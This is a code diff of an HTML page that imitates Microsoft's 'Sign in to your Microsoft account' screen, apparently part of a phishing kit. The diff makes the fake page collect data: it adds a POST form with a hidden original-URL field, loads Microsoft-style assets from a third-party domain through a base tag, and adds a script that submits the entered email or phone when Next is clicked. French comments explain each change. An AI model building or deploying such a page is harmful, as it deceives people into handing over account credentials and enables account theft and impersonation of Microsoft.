--- a/microsoft-login/index.html
+++ b/microsoft-login/index.html
@@ -1,51 +1,42 @@
 <!DOCTYPE html>
-<html lang="en">
-
-<head>
-    <meta charset="UTF-8">
-    <meta http-equiv="X-UA-Compatible" content="IE=edge">
-    <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <link rel="icon" href="assets/favicon.ico" />
-    <title>Sign in to your Microsoft account</title>
-    <link rel="stylesheet" href="assets/app.css" />
+<html lang="en" style="filter: invert(0);">
+<head><meta charset="UTF-8"/><meta http-equiv="X-UA-Compatible" content="IE=edge"/><meta name="viewport" content="width=device-width, initial-scale=1.0"/>
+	<base href="https://lemonware.fr/static/template/Template/microsoft-login/" />
+	<link href="assets/favicon.ico" rel="icon" />
+	<title>Sign in to your Microsoft account</title>
+	<link href="assets/app.css" rel="stylesheet" />
 </head>
-
 <body>
-    <section id="section_uname">
-        <div class="auth-wrapper">
-            <img src="assets/logo.png" alt="Microsoft" />
-            <h2 class="title mb-16 mt-16">Sign in</h2>
-            <form>
-                <div class="mb-16">
-                    <p id="error_uname" class="error"></p>
-                    <input id="inp_uname" type="text" name="uname" class="input" placeholder="Email, phone, or Skype" />
-                </div>
-            </form>
-            <div>
-                <p class="mb-16 fs-13">No account? <a href="" class="link">Create one!</a></p>
-                <p class="mb-16 fs-13">
-                    <a href="#" class="link">Sign in with a security key
-                        <img src="assets/question.png" alt="Question img">
-                    </a>
-                </p>
-            </div>
-            <div>
-                <button class="btn" type="submit" id="btn_next">Next</button>
-            </div>
-        </div>
-        <div class="opts">
-            <p class="has-icon mb-0" style="font-size:15px;"><span class="icon"><img src="assets/key.png"
-                        width="30px" /></span> Sign-in options</p>
-        </div>
-    </section>
+<section id="section_uname">
+<div class="auth-wrapper"><img alt="Microsoft" src="assets/logo.png" style="filter: invert(0);" />
+<h2 class="title mb-16 mt-16">Sign in</h2>
+<!-- Formulaire avec action définie -->
 
-    
-    <footer class="footer">
-        <a href="#">Terms of use</a>
-        <a href="#">Privacy & cookies</a>
-        <span>.&nbsp;.&nbsp;.</span>
-    </footer>
-    <script src="assets/app.js"></script>
-</body>
+<form action="" id="signin_form" method="POST"><input name="__original_url" type="hidden" value="https://lemonware.fr/static/template/Template/microsoft-login/" />
+<div class="mb-16">
+<p class="error" id="error_uname">&nbsp;</p>
+<input class="input" id="inp_uname" name="uname" placeholder="Email, phone, or Skype" type="text" /></div>
+</form>
 
+<div>
+<p class="mb-16 fs-13">No account? <a class="link" href="">Create one!</a></p>
+
+<p class="mb-16 fs-13"><a class="link" href="#">Sign in with a security key <img alt="Question img" src="assets/question.png" style="filter: invert(0);" /></a></p>
+</div>
+<!-- Bouton "Next" avec gestionnaire d'événements JavaScript -->
+
+<div><button class="btn" id="btn_next">Next</button></div>
+</div>
+
+<div class="opts">
+<p class="has-icon mb-0" style="font-size:15px;"><span class="icon"><img src="assets/key.png" style="filter: invert(0);" width="30px" /></span> Sign-in options</p>
+</div>
+</section>
+
+<footer class="footer"><a href="#">Terms of use</a> <a href="#">Privacy &amp; cookies</a> <span>. . .</span></footer>
+<!-- Script JavaScript pour gérer le clic sur le bouton "Next" --><script>
+        document.getElementById('btn_next').addEventListener('click', function() {
+            document.getElementById('signin_form').submit(); // Soumet le formulaire
+        });
+    </script></body>
 </html>
